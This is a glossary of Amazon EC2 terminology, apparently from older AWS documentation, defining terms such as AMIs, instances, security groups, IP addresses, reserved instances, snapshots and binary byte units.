gibibyte (GiB)
a contraction of giga binary byte, a gibibyte is 2^30 bytes or 1,073,741,824 bytes. A gigabyte is 10^9 or 1,000,000,000 bytes. So yes, Amazon has bigger bytes.

image
See Amazon machine image.

instance
Once an AMI has been launched, the resulting running system is referred to as an instance. All instances based on the same AMI start out identical and any information on them is lost when the instances are terminated or fail.

instance store
The disk storage associated with an instance. In the event an instance fails or is terminated (not simply rebooted), all content on the instance store is deleted.

group
Also known as a security group, groups define firewall rules that can be shared among a group of instances that have similar security requirements. The group is specified at instance launch.

launch permission
AMI attribute allowing users to launch an AMI

Linux
Amazon EC2 instances are available for many operating platforms, including Linux, Solaris, Windows, and others.

paid AMI
An AMI that you sell to other Amazon EC2 users. For more information, refer to the Amazon DevPay Developer Guide.

private IP address
All Amazon EC2 instances are assigned two IP addresses at launch: a private address (RFC 1918) and a public address that are directly mapped to each other through Network Address Translation (NAT).

public AMI
An AMI that all users have launch permissions for.

public data sets
Sets of large public data sets that can be seamlessly integrated into AWS cloud-based applications. Amazon stores the data sets at no charge to the community and, like all AWS services, users pay only for the compute and storage they use for their own applications. These data sets currently include data from the Human Genome Project, the U.S. Census, Wikipedia, and other sources.

public IP address
All Amazon EC2 instances are assigned two IP addresses at launch: a private address (RFC 1918) and a public address that are directly mapped to each other through Network Address Translation (NAT).

region
A geographical area in which you can launch instances (e.g., US, EU).

reservation
A collection of instances started as part of the same launch request.

Reserved Instance
An additional Amazon EC2 pricing option. With Reserved Instances, you can make a low one-time payment for each instance to reserve and receive a significant discount on the hourly usage charge for that instance.

security group
A security group is a named collection of access rules. These access rules specify which ingress (i.e., incoming) network traffic should be delivered to your instance. All other ingress traffic will be discarded.

shared AMI
AMIs that developers build and make available for other AWS developers to use.

Solaris
Amazon EC2 instances are available for many operating platforms, including Linux, Solaris, Windows, and others.

snapshot
Amazon EBS provides the ability to create snapshots or backups of your Amazon EBS volumes and store them in Amazon S3. You can use these snapshots as the starting point for new Amazon EBS volumes and to protect your data for long term durability.

supported AMIs
These AMIs are similar to paid AMIs, except that you charge for software or a service that customers use with their own AMIs.

tebibyte (TiB)
a contraction of tera binary byte, a tebibyte is 2^40 bytes or 1,099,511,627,776 bytes. A terabyte is 10^12 or 1,000,000,000,000 bytes. So yes, Amazon has bigger bytes.

UNIX
Amazon EC2 instances are available for many operating platforms, including Linux, Solaris, Windows, and others.

Windows
Amazon EC2 instances are available for many operating platforms, including Linux, Solaris, Windows, and others.